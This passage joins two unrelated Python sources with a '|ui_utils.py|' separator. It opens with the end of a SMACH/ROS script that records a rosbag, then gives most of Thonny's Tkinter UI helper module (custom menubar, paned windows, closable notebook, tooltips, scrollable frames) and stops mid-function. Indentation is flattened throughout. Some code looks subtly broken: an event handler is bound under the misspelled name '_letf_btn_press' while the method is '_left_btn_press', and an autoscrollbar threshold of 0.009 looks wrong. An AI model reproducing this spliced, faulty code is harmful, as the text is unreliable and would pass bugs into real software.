    sm.userdata.rate = 100.0
    sm.userdata.topic = 'smacha/rosbag_api_recording_1_point'
    sm.userdata.file = '/tmp/rosbag_api_recording_1.bag'
    sm.userdata.topics = ['smacha/rosbag_api_recording_1_point']
with sm:
smach.StateMachine.add('PUBLISH_MSG',
PublishMsgState('PUBLISH_MSG', msg_publisher, 'start'),
transitions={'aborted':'aborted',
'succeeded':'START_RECORDING'},
remapping={'msg':'point',
'rate':'rate',
'topic':'topic'})
smach.StateMachine.add('START_RECORDING',
RecordROSBagState('START_RECORDING', bag_recorder, 'start'),
transitions={'aborted':'aborted',
'succeeded':'WAIT'},
remapping={'file':'file',
'topics':'topics'})
smach.StateMachine.add('WAIT',
SleepState(5),
transitions={'succeeded':'STOP_RECORDING'})
smach.StateMachine.add('STOP_RECORDING',
RecordROSBagState('STOP_RECORDING', bag_recorder, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'UNPUBLISH_MSG'})
smach.StateMachine.add('UNPUBLISH_MSG',
PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
transitions={'aborted':'aborted',
'succeeded':'succeeded'})
outcome = sm.execute()
if __name__ == '__main__':
main()
|
ui_utils.py
|
# -*- coding: utf-8 -*-
import collections
import logging
import os
import platform
import re
import shutil
import signal
import subprocess
import textwrap
import threading
import time
import tkinter as tk
import tkinter.font
import traceback
from tkinter import filedialog, messagebox, ttk
from typing import Callable, List, Optional, Tuple, Union # @UnusedImport
from thonny import get_workbench, misc_utils, tktextext
from thonny.common import TextRange
from thonny.misc_utils import running_on_linux, running_on_mac_os, running_on_windows
from thonny.tktextext import TweakableText
import sys
from _tkinter import TclError
import webbrowser
# i18n #
import gettext
gettext.install('thonny', os.path.join(os.path.dirname(__file__), "locale"))
class CustomMenubar(ttk.Frame):
def __init__(self, master):
ttk.Frame.__init__(self, master, style="CustomMenubar.TFrame")
self._menus = []
self._opened_menu = None
ttk.Style().map(
"CustomMenubarLabel.TLabel",
background=[
("!active", lookup_style_option("Menubar", "background", "gray")),
("active", lookup_style_option("Menubar", "activebackground", "LightYellow")),
],
foreground=[
("!active", lookup_style_option("Menubar", "foreground", "black")),
("active", lookup_style_option("Menubar", "activeforeground", "black")),
],
)
def add_cascade(self, label, menu):
label_widget = ttk.Label(
self,
style="CustomMenubarLabel.TLabel",
text=label,
padding=[6, 3, 6, 2],
font="TkDefaultFont",
)
if len(self._menus) == 0:
padx = (6, 0)
else:
padx = 0
label_widget.grid(row=0, column=len(self._menus), padx=padx)
def enter(event):
label_widget.state(("active",))
# Don't know how to open this menu when another menu is open
# another tk_popup just doesn't work unless old menu is closed by click or Esc
# https://stackoverflow.com/questions/38081470/is-there-a-way-to-know-if-tkinter-optionmenu-dropdown-is-active
# unpost doesn't work in Win and Mac: https://www.tcl.tk/man/tcl8.5/TkCmd/menu.htm#M62
# print("ENTER", menu, self._opened_menu)
if self._opened_menu is not None:
self._opened_menu.unpost()
click(event)
def leave(event):
label_widget.state(("!active",))
def click(event):
try:
# print("Before")
self._opened_menu = menu
menu.tk_popup(
label_widget.winfo_rootx(),
label_widget.winfo_rooty() + label_widget.winfo_height(),
)
finally:
# print("After")
self._opened_menu = None
label_widget.bind("<Enter>", enter, True)
label_widget.bind("<Leave>", leave, True)
label_widget.bind("<1>", click, True)
self._menus.append(menu)
class AutomaticPanedWindow(tk.PanedWindow):
"""
Enables inserting panes according to their position_key-s.
Automatically adds/removes itself to/from its master AutomaticPanedWindow.
Fixes some style glitches.
"""
def __init__(self, master, position_key=None, preferred_size_in_pw=None, **kwargs):
tk.PanedWindow.__init__(self, master, **kwargs)
self._pane_minsize = 100
self.position_key = position_key
self._restoring_pane_sizes = False
self._last_window_size = (0, 0)
self._full_size_not_final = True
self._configure_binding = self.bind("<Configure>", self._on_window_resize, True)
self._update_appearance_binding = self.bind(
"<<ThemeChanged>>", self._update_appearance, True
)
self.bind("<B1-Motion>", self._on_mouse_dragged, True)
self._update_appearance()
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def insert(self, pos, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
if pos == "auto":
# According to documentation I should use self.panes()
# but this doesn't return expected widgets
for sibling in sorted(
self.pane_widgets(),
key=lambda p: p.position_key if hasattr(p, "position_key") else 0,
):
if (
not hasattr(sibling, "position_key")
                    or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
if isinstance(pos, tk.Widget):
kw["before"] = pos
self.add(child, **kw)
def add(self, child, **kw):
kw.setdefault("minsize", self._pane_minsize)
tk.PanedWindow.add(self, child, **kw)
self._update_visibility()
self._check_restore_preferred_sizes()
def remove(self, child):
tk.PanedWindow.remove(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def forget(self, child):
tk.PanedWindow.forget(self, child)
self._update_visibility()
self._check_restore_preferred_sizes()
def destroy(self):
self.unbind("<Configure>", self._configure_binding)
self.unbind("<<ThemeChanged>>", self._update_appearance_binding)
tk.PanedWindow.destroy(self)
def is_visible(self):
if not isinstance(self.master, AutomaticPanedWindow):
return self.winfo_ismapped()
else:
return self in self.master.pane_widgets()
def pane_widgets(self):
result = []
for pane in self.panes():
# pane is not the widget but some kind of reference object
assert not isinstance(pane, tk.Widget)
result.append(self.nametowidget(str(pane)))
return result
def _on_window_resize(self, event):
if event.width < 10 or event.height < 10:
return
window = self.winfo_toplevel()
window_size = (window.winfo_width(), window.winfo_height())
initializing = hasattr(window, "initializing") and window.initializing
if (
not initializing
and not self._restoring_pane_sizes
and (window_size != self._last_window_size or self._full_size_not_final)
):
self._check_restore_preferred_sizes()
self._last_window_size = window_size
def _on_mouse_dragged(self, event):
if event.widget == self and not self._restoring_pane_sizes:
self._update_preferred_sizes()
def _update_preferred_sizes(self):
for pane in self.pane_widgets():
if getattr(pane, "preferred_size_in_pw", None) is not None:
if self.cget("orient") == "horizontal":
current_size = pane.winfo_width()
else:
current_size = pane.winfo_height()
if current_size > 20:
pane.preferred_size_in_pw = current_size
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=current_size)
# else:
# self.paneconfig(pane, height=current_size)
#
# else:
# self.paneconfig(pane, width=1000, height=1000)
def _check_restore_preferred_sizes(self):
window = self.winfo_toplevel()
if getattr(window, "initializing", False):
return
try:
self._restoring_pane_sizes = True
self._restore_preferred_sizes()
finally:
self._restoring_pane_sizes = False
def _restore_preferred_sizes(self):
total_preferred_size = 0
panes_without_preferred_size = []
panes = self.pane_widgets()
for pane in panes:
if not hasattr(pane, "preferred_size_in_pw"):
# child isn't fully constructed yet
return
if pane.preferred_size_in_pw is None:
panes_without_preferred_size.append(pane)
# self.paneconfig(pane, width=1000, height=1000)
else:
total_preferred_size += pane.preferred_size_in_pw
# Without updating pane width/height attribute
# the preferred size may lose effect when squeezing
# non-preferred panes too small. Also zooming/unzooming
# changes the supposedly fixed panes ...
#
# but
# paneconfig width/height effectively puts
# unexplainable maxsize to some panes
# if self.cget("orient") == "horizontal":
# self.paneconfig(pane, width=pane.preferred_size_in_pw)
# else:
# self.paneconfig(pane, height=pane.preferred_size_in_pw)
assert len(panes_without_preferred_size) <= 1
size = self._get_size()
if size is None:
return
        leftover_size = size - total_preferred_size
used_size = 0
for i, pane in enumerate(panes[:-1]):
used_size += pane.preferred_size_in_pw or leftover_size
self._place_sash(i, used_size)
used_size += int(str(self.cget("sashwidth")))
def _get_size(self):
if self.cget("orient") == tk.HORIZONTAL:
result = self.winfo_width()
else:
result = self.winfo_height()
if result < 20:
# Not ready yet
return None
else:
return result
def _place_sash(self, i, distance):
if self.cget("orient") == tk.HORIZONTAL:
self.sash_place(i, distance, 0)
else:
self.sash_place(i, 0, distance)
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.panes()) == 0 and self.is_visible():
self.master.forget(self)
if len(self.panes()) > 0 and not self.is_visible():
self.master.insert("auto", self)
def _update_appearance(self, event=None):
self.configure(sashwidth=lookup_style_option("Sash", "sashthickness", 10))
self.configure(background=lookup_style_option("TPanedWindow", "background"))
class ClosableNotebook(ttk.Notebook):
def __init__(self, master, style="ButtonNotebook.TNotebook", **kw):
super().__init__(master, style=style, **kw)
self.tab_menu = self.create_tab_menu()
self._popup_index = None
self.pressed_index = None
self.bind("<ButtonPress-1>", self._letf_btn_press, True)
self.bind("<ButtonRelease-1>", self._left_btn_release, True)
if running_on_mac_os():
self.bind("<ButtonPress-2>", self._right_btn_press, True)
self.bind("<Control-Button-1>", self._right_btn_press, True)
else:
self.bind("<ButtonPress-3>", self._right_btn_press, True)
# self._check_update_style()
def create_tab_menu(self):
menu = tk.Menu(self.winfo_toplevel(), tearoff=False, **get_style_configuration("Menu"))
menu.add_command(label=_("Close"), command=self._close_tab_from_menu)
menu.add_command(label=_("Close others"), command=self._close_other_tabs)
menu.add_command(label=_("Close all"), command=self.close_tabs)
return menu
    def _left_btn_press(self, event):
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
if "closebutton" in elem:
self.state(["pressed"])
self.pressed_index = index
except Exception:
# may fail, if clicked outside of tab
return
def _left_btn_release(self, event):
if not self.instate(["pressed"]):
return
try:
elem = self.identify(event.x, event.y)
index = self.index("@%d,%d" % (event.x, event.y))
except Exception:
# may fail, when mouse is dragged
return
else:
if "closebutton" in elem and self.pressed_index == index:
self.close_tab(index)
self.state(["!pressed"])
finally:
self.pressed_index = None
def _right_btn_press(self, event):
try:
index = self.index("@%d,%d" % (event.x, event.y))
self._popup_index = index
self.tab_menu.tk_popup(*self.winfo_toplevel().winfo_pointerxy())
except Exception:
logging.exception("Opening tab menu")
def _close_tab_from_menu(self):
self.close_tab(self._popup_index)
def _close_other_tabs(self):
self.close_tabs(self._popup_index)
def close_tabs(self, except_index=None):
for tab_index in reversed(range(len(self.winfo_children()))):
if except_index is not None and tab_index == except_index:
continue
else:
self.close_tab(tab_index)
def close_tab(self, index):
child = self.get_child_by_index(index)
if hasattr(child, "close"):
child.close()
else:
self.forget(index)
child.destroy()
def get_child_by_index(self, index):
tab_id = self.tabs()[index]
if tab_id:
return self.nametowidget(tab_id)
else:
return None
def get_current_child(self):
child_id = self.select()
if child_id:
return self.nametowidget(child_id)
else:
return None
def focus_set(self):
editor = self.get_current_child()
if editor:
editor.focus_set()
else:
super().focus_set()
def _check_update_style(self):
style = ttk.Style()
if "closebutton" in style.element_names():
# It's done already
return
# respect if required images have been defined already
if "img_close" not in self.image_names():
img_dir = os.path.join(os.path.dirname(__file__), "res")
ClosableNotebook._close_img = tk.PhotoImage(
"img_tab_close", file=os.path.join(img_dir, "tab_close.gif")
)
ClosableNotebook._close_active_img = tk.PhotoImage(
"img_tab_close_active", file=os.path.join(img_dir, "tab_close_active.gif")
)
style.element_create(
"closebutton",
"image",
"img_tab_close",
("active", "pressed", "!disabled", "img_tab_close_active"),
("active", "!disabled", "img_tab_close_active"),
border=8,
sticky="",
)
style.layout(
"ButtonNotebook.TNotebook.Tab",
[
(
"Notebook.tab",
{
"sticky": "nswe",
"children": [
(
"Notebook.padding",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.focus",
{
"side": "top",
"sticky": "nswe",
"children": [
(
"Notebook.label",
{"side": "left", "sticky": ""},
),
(
"Notebook.closebutton",
{"side": "left", "sticky": ""},
),
],
},
)
],
},
)
],
},
)
],
)
def _check_remove_padding(self, kw):
# Windows themes produce 1-pixel padding to the bottom of the pane
# Don't know how to get rid of it using themes
if "padding" not in kw and ttk.Style().theme_use().lower() in (
"windows",
"xpnative",
"vista",
):
kw["padding"] = (0, 0, 0, -1)
def add(self, child, **kw):
self._check_remove_padding(kw)
super().add(child, **kw)
def insert(self, pos, child, **kw):
self._check_remove_padding(kw)
super().insert(pos, child, **kw)
class AutomaticNotebook(ClosableNotebook):
"""
Enables inserting views according to their position keys.
Remember its own position key. Automatically updates its visibility.
"""
def __init__(self, master, position_key, preferred_size_in_pw=None):
if get_workbench().in_simple_mode():
style = "TNotebook"
else:
style = "ButtonNotebook.TNotebook"
super().__init__(master, style=style, padding=0)
self.position_key = position_key
# should be in the end, so that it can be detected when
# constructor hasn't completed yet
self.preferred_size_in_pw = preferred_size_in_pw
def add(self, child, **kw):
super().add(child, **kw)
self._update_visibility()
def insert(self, pos, child, **kw):
if pos == "auto":
for sibling in map(self.nametowidget, self.tabs()):
if (
not hasattr(sibling, "position_key")
                    or sibling.position_key is None
or sibling.position_key > child.position_key
):
pos = sibling
break
else:
pos = "end"
super().insert(pos, child, **kw)
self._update_visibility()
def hide(self, tab_id):
super().hide(tab_id)
self._update_visibility()
def forget(self, tab_id):
if tab_id in self.tabs() or tab_id in self.winfo_children():
super().forget(tab_id)
self._update_visibility()
def is_visible(self):
return self in self.master.pane_widgets()
def get_visible_child(self):
for child in self.winfo_children():
if str(child) == str(self.select()):
return child
return None
def _update_visibility(self):
if not isinstance(self.master, AutomaticPanedWindow):
return
if len(self.tabs()) == 0 and self.is_visible():
self.master.remove(self)
if len(self.tabs()) > 0 and not self.is_visible():
self.master.insert("auto", self)
class TreeFrame(ttk.Frame):
def __init__(
self,
master,
columns,
displaycolumns="#all",
show_scrollbar=True,
borderwidth=0,
relief="flat",
**tree_kw,
):
ttk.Frame.__init__(self, master, borderwidth=borderwidth, relief=relief)
# http://wiki.tcl.tk/44444#pagetoc50f90d9a
self.vert_scrollbar = ttk.Scrollbar(
self, orient=tk.VERTICAL, style=scrollbar_style("Vertical")
)
if show_scrollbar:
self.vert_scrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.tree = ttk.Treeview(
self,
columns=columns,
displaycolumns=displaycolumns,
yscrollcommand=self.vert_scrollbar.set,
**tree_kw,
)
self.tree["show"] = "headings"
self.tree.grid(row=0, column=0, sticky=tk.NSEW)
self.vert_scrollbar["command"] = self.tree.yview
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.tree.bind("<<TreeviewSelect>>", self.on_select, "+")
self.tree.bind("<Double-Button-1>", self.on_double_click, "+")
def _clear_tree(self):
for child_id in self.tree.get_children():
self.tree.delete(child_id)
def clear(self):
self._clear_tree()
def on_select(self, event):
pass
def on_double_click(self, event):
pass
def scrollbar_style(orientation):
# In mac ttk.Scrollbar uses native rendering unless style attribute is set
# see http://wiki.tcl.tk/44444#pagetoc50f90d9a
# Native rendering doesn't look good in dark themes
if running_on_mac_os() and get_workbench().uses_dark_ui_theme():
return orientation + ".TScrollbar"
else:
return None
def sequence_to_accelerator(sequence):
"""Translates Tk event sequence to customary shortcut string
for showing in the menu"""
if not sequence:
return ""
if not sequence.startswith("<"):
return sequence
accelerator = (
sequence.strip("<>").replace("Key-", "").replace("KeyPress-", "").replace("Control", "Ctrl")
)
# Tweaking individual parts
parts = accelerator.split("-")
# tkinter shows shift with capital letter, but in shortcuts it's customary to include it explicitly
    if len(parts[-1]) == 1 and parts[-1].isupper() and "Shift" not in parts:
parts.insert(-1, "Shift")
# even when shift is not required, it's customary to show shortcut with capital letter
if len(parts[-1]) == 1:
parts[-1] = parts[-1].upper()
accelerator = "+".join(parts)
# Post processing
accelerator = (
accelerator.replace("Minus", "-")
.replace("minus", "-")
.replace("Plus", "+")
.replace("plus", "+")
)
return accelerator
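# Examples (hedged; traced through the logic above):
#
#     sequence_to_accelerator("<Control-s>")        # -> "Ctrl+S"
#     sequence_to_accelerator("<Control-Shift-S>")  # -> "Ctrl+Shift+S"
#     sequence_to_accelerator("F5")                 # -> "F5" (returned unchanged)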
def get_zoomed(toplevel):
if "-zoomed" in toplevel.wm_attributes(): # Linux
return bool(toplevel.wm_attributes("-zoomed"))
else: # Win/Mac
return toplevel.wm_state() == "zoomed"
def set_zoomed(toplevel, value):
if "-zoomed" in toplevel.wm_attributes(): # Linux
toplevel.wm_attributes("-zoomed", str(int(value)))
else: # Win/Mac
if value:
toplevel.wm_state("zoomed")
else:
toplevel.wm_state("normal")
class EnhancedTextWithLogging(tktextext.EnhancedText):
def direct_insert(self, index, chars, tags=None, **kw):
try:
# try removing line numbers
# TODO: shouldn't it take place only on paste?
# TODO: does it occur when opening a file with line numbers in it?
# if self._propose_remove_line_numbers and isinstance(chars, str):
# chars = try_remove_linenumbers(chars, self)
concrete_index = self.index(index)
return tktextext.EnhancedText.direct_insert(self, index, chars, tags=tags, **kw)
finally:
get_workbench().event_generate(
"TextInsert", index=concrete_index, text=chars, tags=tags, text_widget=self
)
def direct_delete(self, index1, index2=None, **kw):
try:
# index1 may be eg "sel.first" and it doesn't make sense *after* deletion
concrete_index1 = self.index(index1)
if index2 is not None:
concrete_index2 = self.index(index2)
else:
concrete_index2 = None
return tktextext.EnhancedText.direct_delete(self, index1, index2=index2, **kw)
finally:
get_workbench().event_generate(
"TextDelete", index1=concrete_index1, index2=concrete_index2, text_widget=self
)
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError(_("cannot use pack with this widget"))
def place(self, **kw):
raise tk.TclError(_("cannot use place with this widget"))
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
tw.wm_geometry("+%d+%d" % (x, y))
try:
# For Mac OS
tw.tk.call("::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates")
except tk.TclError:
pass
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(tk.Toplevel):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError(_("Unsupported focus"))
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
def create_string_var(value, modification_listener=None):
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return _create_var(tk.StringVar, value, modification_listener)
def create_int_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.IntVar, value, modification_listener)
def create_double_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.DoubleVar, value, modification_listener)
def create_boolean_var(value, modification_listener=None):
"""See create_string_var"""
return _create_var(tk.BooleanVar, value, modification_listener)
def _create_var(class_, value, modification_listener):
var = class_(value=value)
var.modified = False
def on_write(*args):
var.modified = True
if modification_listener:
try:
modification_listener()
except Exception:
                # Otherwise the whole process would be brought down,
                # because for some reason Tk tries to call a non-existing
                # method on the variable
get_workbench().report_exception()
# TODO: https://bugs.python.org/issue22115 (deprecation warning)
var.trace("w", on_write)
return var
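# Typical usage of the helpers above; update_apply_button and save_setting
# are hypothetical callables, not part of this module:
#
#   name_var = create_string_var("", modification_listener=update_apply_button)
#   name_var.set("Thonny")  # any write sets name_var.modified to True
#   if name_var.modified:
#       save_setting("name", name_var.get())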
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
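# For example, "<Control-c>" maps to (0x0004, ord("C")) and
# "<Control-Shift-C>" to (0x0004 | 0x0001, ord("C")); sequences without
# Control, or with unsupported modifiers, yield None.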
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title=_("Remove linenumbers"),
message=_("Do you want to remove linenumbers from pasted text?"),
default=messagebox.YES,
master=master,
parent=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
    return len(lines) > 2 and all(len(split_after_line_number(line)) == 2 for line in lines)
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
